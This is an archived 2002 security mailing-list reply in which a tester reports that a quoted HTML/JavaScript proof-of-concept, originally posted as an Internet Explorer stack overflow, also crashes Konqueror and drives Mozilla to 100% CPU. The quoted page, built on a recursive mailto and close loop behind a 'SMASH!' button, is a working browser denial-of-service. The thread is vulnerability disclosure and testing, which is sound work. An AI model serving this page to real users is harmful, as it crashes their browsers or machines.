After a few minutes testing it seems this does not only effect Internet Explorer but also the following browsers: In KDE's konqueror Latest Version it Seg Faults the browser instantly In Mozilla 0.99 it causes a Denial of Service situation against the machine with 100% CPU usage, and some crazy hard drive accessing until the process is killed Other information: Netscape 6 series latest version does nothing when SMASH! is clicked Galeon latest tries to mail a rather long email address, but the browser itself is un-effected Test System: Linux Redhat 7.3 2.4.18-4 #1 Thu May 2 18:06:25 EDT 2002 i686 --------------------------------- Scott Mackenzie Cybernetics & Virtual Worlds (2) Bradford University http://smackenz.zapto.org --------------------------------- On Sun, 2002-06-02 at 22:08, Matias Sedalo wrote: > the 28/07/1999 I have discovered a stack buffer overflow caused by until > the moment all the versions of the Internet Explorer. > In many windows98 causes the necessity to reinitiate the equipment, since > to my to seem it remains without memory. > Only it has been proven in several versions 5 of IE on WindowsNT > server sp6 and windows98 Second Edition. As I said before the Windows 98 > I had to reinitiate it to the force. > Can be possible to execute arbitrary code using the variable company of > the example? > > // internet Explorer 5.00.2314.1003 on WindowsNT 4 sp6 > // internet Explorer 5.00.3500.1003 on Windows98se > > -----------cut here--------------------------- > <html><head></head> > <script language="JAVASCRIPT"> > function hacerMail() { > var company; > > crear(); > address="s0t4ipv6at_private"; > soporte(); > } > function soporte(){ > var soporte="billat_private"; > window.location="mailto:"+address+"?cc="+soporte+"&subject="+company; > // window.location=company; // also this line cause the bof. > close(hacerMail()); > } > function crear(){ > company="shellcode here?\n"; // i don't think so. > } > </script> > <input type="button" onClick="hacerMail();" value="SMASH!"></input> > </html> > -----------cut here--------------------------- > > Regards. > > - Internet es perjudicial para la salud - > - Ley N~ 127.0.0.1 > > Matias Sedalo > http://www.shellcode.com.ar > > s0t4ipv6at_private > B7A1 B45E 4906 34BD 70A1 55F8 E5A0 BCA2 > ....................................... > > > >
This archive was generated by hypermail 2b30 : Sun Jun 02 2002 - 17:30:23 PDT